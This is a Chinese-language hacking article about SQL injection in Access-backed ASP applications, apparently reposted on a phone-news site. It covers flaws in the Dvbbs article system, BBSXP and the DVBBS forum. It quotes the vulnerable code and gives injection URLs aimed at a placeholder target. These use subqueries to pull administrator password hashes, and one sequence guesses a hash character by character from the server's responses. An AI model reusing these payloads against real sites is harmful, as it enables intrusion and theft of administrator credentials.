您的位置 首页 趣闻

Sql Injection with Access

,Sql Injection with Access

>>>Dedicated This Scrap To CaoJing<<< 

很多朋友在ACCESS下进行SQL注入攻击的时候,总会抱怨:ACCESS功能太弱了,没有注释符、不支持多语句查询...另一方面,很多程序员在使用ACCESS做数据库写程序时,往往只对那些对敏感表的操作代码执行严格审查,而其他一些表的操作代码就很粗糙了。这只能说我们对ACCESS了解太少了,前不久我有幸看到了一个专门的ACCESS站点,其论坛划分了很多版块,竟然全是和ACCESS有关的;原来这里头的学问还蛮多的,我等只是略懂皮毛而已。小弟愚笨,没能力写概览型的文章,还是通过几个例子来向大家说明些问题: 

一:动网文章 

涉及版本: 
^^^^^^^^^^ 
动网文章所有版本 

描述: 
^^^^^^ 
动网文章是一款由WWW.ASPSKY.NET开发和维护的源代码开放的文章管理系统,在国内使用非常广泛;由于其list.asp文件没有过滤用户提交传递给SQL查询的输入,导致远程攻击者可以利用这个漏洞进行SQL注入攻击。 

具体: 
^^^^^^ 
试看list.asp中的相关代码: 
15 sql="select Aclass.class,ANclass.Nclass,article.title,article.classid,article.Nclassid from article,Aclass,ANclass where article.classid=Aclass.classid and article.Nclassid=ANclass.Nclassid and article.articleID="&request("id") 

id没有经任何检查就直接放到SQL查询中,这点大家都很容易看出来,但说到利用,一些朋友就可是犯难了:这个语句对应的表是 article ,但管理密码在 admin 表里面,ACCESS又不能执行多语句查询,这个bug有什么用啊?呵呵,我们使用子查询不就得了,方法好多哦: 

http://www.target.com/asp/darticle/list.asp?id=(select id from admin where flag=1) 

http://www.target.com/asp/darticle/list.asp?id=(select min(id) from admin where flag=1) 

http://www.target.com/asp/darticle/list.asp?id=1 and exists (select id from admin where flag=1) 

http://www.target.com/asp/darticle/list.asp?id=1 and article.articleID  in (select top 1 id from admin where len(password)>1 order by id) 
等等... 

怎么得到管理员密码就不用我废话了吧:) 

二:BBSXP 

涉及版本: 
^^^^^^^^^^ 
BBSXP所有版本 

描述: 
^^^^^^ 
BBSXP是一款由WWW.BBSXP.COM开发和维护的源代码开放的Asp论坛;由于作者采用的安全防护措施过于简单,导致整个论坛多个文件存在Sql Injection漏洞,非法用户可以很快地智能破解任意用户口令或进行其他恶意攻击。 

具体: 
^^^^^^ 
前不久我写了篇关于BBSXP漏洞的文章,作者简单的把论坛升了级,但仍然没有全面解决Sql Injection的问题,比如说: 
bank.asp 
------------------------------------------------------------------------------- 
152  sql="select * from user where username='"&request("dxname")&"'" 
153  rs1.Open sql,Conn,1,3 
154  if rs1.eof then 
155  message=message&"

  • 查无此人的账号!" 
    156  end if 
    ------------------------------------------------------------------------------- 
    呵呵,拿user表中所有用户密码没问题了,但又有人开始嘀咕了:BBSXP后台管理密码和论坛前台密码不同,怎么办啊? 
    后台密码存放在 clubconfig 表中,还是和上面利用方法一样,使用子查询嘛。 
    还给个例子吧: 
    searchok.asp 
    ------------------------------------------------------------------------------- 
    forumid=Request("forumid") 
    ... 
    21  if Request("forumid")<>"" then 
    22  forumidor="forumid="&forumid&" and" 
    end if 
    ... 
    sql="select * from forum where deltopic<>1 and "&forumidor&" "&item&" "&TimeLimit&" order by lasttime Desc  " 
    ... 
    ------------------------------------------------------------------------------- 
    提交类似如下URL(最好写个小代码发送这个请求): 
    http://www.target.com/bbsxp165/b ... dminpassword)>1) 
    瞧,我们这不是开始对 clubconfig 表进行查询了吗? 

    三:动网论坛(DVBBS)存在严重漏洞(补充) 
    这个漏洞我公布后,就有好多朋友给我写信,有的问怎么破解MD5(有破解的必要吗?)、有的要测试代码、还有的要我做个动画...同时也有人说后台管理密码和论坛前台密码不同,怎么拿后台的?我猜这些朋友自己没怎么思考,思考应该是种很美的享受吧? 
    我补充下怎么拿后台MD5加密的管理密码: 

    http://www.target.com/dv/tongji. ... id)%20from%20admin), 
    返回: 
    ------------------------------------------------------------------------------- 
    document.write('□');document.write('9');document.write(' 
    ');document.write('□');document.write('9');document.write(' 
    '); 
    ------------------------------------------------------------------------------- 

    http://www.target.com/dv/tongji. ... ere%20left(password,1)='a'), 
    返回: 
    ------------------------------------------------------------------------------- 
    document.write('□');document.write('');document.write(' 
    ');document.write('□');document.write('');document.write(' 
    '); 
    ------------------------------------------------------------------------------- 
    啊,为空,我们猜错了,再来: 

    http://www.target.com/dv/tongji. ... ere%20left(password,1)='d'), 
    返回: 
    ------------------------------------------------------------------------------- 
    document.write('□');document.write('9');document.write(' 
    ');document.write('□');document.write('9');document.write(' 
    '); 
    ------------------------------------------------------------------------------- 
    哈哈,这下猜对了。 
    接下来由你继续,当然,你可以把我以前写的那个小程序稍微修改后再放到这里使用! 

    不过我要提醒你,DVBBS后台管理文件是cookie+session双重认证哦! 

    后记:我到一个原代码下载站随机down了一些程序,包括论坛、留言本、文章下载管理...发现都存在类似的问题。其实只要我们
  • 免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。

    作者: dawei

    【声明】:第七手机网内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。

    为您推荐

    敢为天下后,OPPO Find N折叠屏的底气何在?

    聊起OPPO,给我的第一印象就是本分,而在刚刚发布的OPPO Find N折叠屏手机上,我看到的是OPPO敢为天下后的底气。 当大家还沉浸在前一天发布的马里亚纳MariSilicon X影像NPU芯片时,OPPO又在12月15日推出了旗下首款折叠屏手机产品OPPO Find N。这是一款传闻已

    OPPO Find N展开一刻,两大创新技术打破折痕路上意难平

    荣耀发布了荣耀60系列的新品,特别是荣耀60 Pro的5000万像素超感知AI前置镜头和1亿像素超清后置主摄,是生活和游玩记录的好帮手。多镜录像功能在荣耀50系列上就已开始引入,在荣耀60系列上还新增了AI手势识别,Vlog隔空换镜这一创新功能,对拍摄Vlog来说相当

    深扒天玑9000,发冲高关键年产品底气怎样?

    联发科的天玑9000自公布以来,以过硬的技术实力迅速冲上了包括微博热搜在内的各类话题平台,吹响了冲击旗舰的号角。手机芯片进入4nm时代,arm推出面向未来十年的v9架构,5G技术R16即将商用,内存技术在升级面对全产业大跃进之势,联发科的天玑也迎来了上升的

    想拍更远?汇总今年搭载潜望式长焦摄像头的手机

    部分手机摄影发烧友已不再满足普通的2x长焦摄像头,他们需要拍的更远,画质也不能妥协,于是能拍更远的潜望式长焦摄像头就应运而生了。不过当镜头焦距上去了,后置镜头模组的厚度就难以控制,如果强行塞下更长焦段的镜头,模组厚度将达到1~2cm,这样的手机估

    像素并非越高越好,为何5000万像素手机镜头倍受青欢迎

    500万、800万、1200万像素,智能手机摄像头像素在早年发展的步伐相对还是比较缓慢,近来2000万、4800万、6400万、1.08亿像素接踵而来,手机摄像头的像素规格呈现出十分迅猛的迭代更新速度。然而在2019年首推量产1.08亿像素的智能手机后,至今手机上单颗传感

    返回顶部